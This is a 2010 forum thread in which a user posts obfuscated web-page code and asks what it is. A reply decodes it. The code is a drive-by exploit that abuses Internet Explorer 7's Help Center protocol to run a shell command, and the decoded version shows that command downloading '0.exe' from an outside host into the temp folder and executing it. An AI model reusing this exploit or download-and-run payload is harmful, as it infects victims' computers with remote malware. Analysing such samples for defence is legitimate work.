« previous next »
Pages: [1]   Go Down

Author Topic: Malware?  (Read 4336 times)

0 Members and 1 Guest are viewing this topic.

June 24, 2010, 08:28:28 am
Read 4336 times

y0liny

  • Newbie
  • Offline
  • *
  • 5
Malware?
Help needed ..
What is this ? Can anyone decode this malware?
Code: [Select]
        <html>
                 
                     <body>


if((document.all)&&(navigator.appVersion.indexOf('MSIE 7.')!=-1))
{
try {
rewui321();
}
catch(ex){
document.write('<body>'); setTimeout(function(){rewui321()}, 100);
}

function rewui321(){
var o=document.createElement('iframe');
o.src="hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript+defer%3Eeval%28unescape%28%27new%2BActiveXObject%2528%2522wscript.shell%2522%2529.Run%2528%2522cmd%2B%252Fc%2Bcd%2B..%252F%2526echo%2Bnew%2BFunction%2528ac%2528U%253B%25290%252Cf%2528nuR.s%253B%25292%252Cf%2528eliFoTevaS.o%253B%2529ydoBesnopser.x%2528etirW.o%253B%2529%2528nepO.o%253B1JepyT.o%253B3JedoM.o%253B%2529%2528dnes.x%253B%25290%252C%254001Jdip%25261Jdi%253Fphp.emoclew%252F0808%253Amoc.yrellagratseigna.yfossa%252F%252F%253Aptth%2540%252C%2540TEG%2540%2528nepo.x%253B%2540exe.0%252F%2540%252B%2529%2540PMET%2540%2528metI.%2529%2540ssecorP%2540%2528tnemnorivnE.sJf%253B%2529%2540PTTHLMX.tfosorciM%2540%2528a%2BwenJx%253B%2529%2540maertS.BDODA%2540%2528a%2BwenJo%253B%2529%2540llehS.tpircSW%2540%2528a%2BwenJs%253BtcejbOXevitcA%2BJ%2BaU%2529%2529%2528%2529%253Bfunction%2Bac%2528bc%2529%257BrJUU%253Bfor%2528iJbc.length%253Bi%253EJ0%253Bi--%2529r%252BJbc.substr%2528i%252C1%252C1%2529%253Breturn%2Br%257D%2B%253E.js%257Ccscript%2B.js%2526del%2B%252Fq%2B.js%257Ctaskkill%2B%252FF%2B%252FIM%2Bhelpctr.exe%2522.replace%2528%252F%2540%252Fg%252CString.fromCharCode%252834%2529%2529.replace%2528%252FJ%252Fg%252CString.fromCharCode%252861%2529%2529.replace%2528%252FU%252Fg%252CString.fromCharCode%252839%2529%2529%252C0%252C1%2529%27%29%29%3C%2Fscript%3E";
document.body.appendChild(o);
}                       
}
</body>
</html>

Logged
ROD, BLESS!
June 24, 2010, 11:10:10 am
Reply #1

Garlando

  • Full Member
  • Offline
  • ***
  • 40
Re: Malware?
Logged
June 24, 2010, 02:23:32 pm
Reply #2

philipp

  • Special Members
  • Sr. Member
  • Offline
  • *
  • 218
Re: Malware?
relevant part, more readable:
Code: [Select]
cmd /c cd ../&echo a = ActiveXObject;s=new a("WScript.Shell");o=new a("ADODB.Stream");x=new a("Microsoft.XMLHTTP");f=s.Environment("Process").Item("TEMP")+"/0.exe";x.open("GET","http://assofy.angiestargallery.com:8080/welcome.php?id=1&pid=10",0);x.send();o.Mode=3;o.Type=1;o.Open();o.Write(x.responseBody);o.SaveToFile(f,2);s.Run(f,0); >.js|cscript .js&del /q .js|taskkill /F /IM helpctr.exe 0 1
Logged
Pages: [1]   Go Up
« previous next »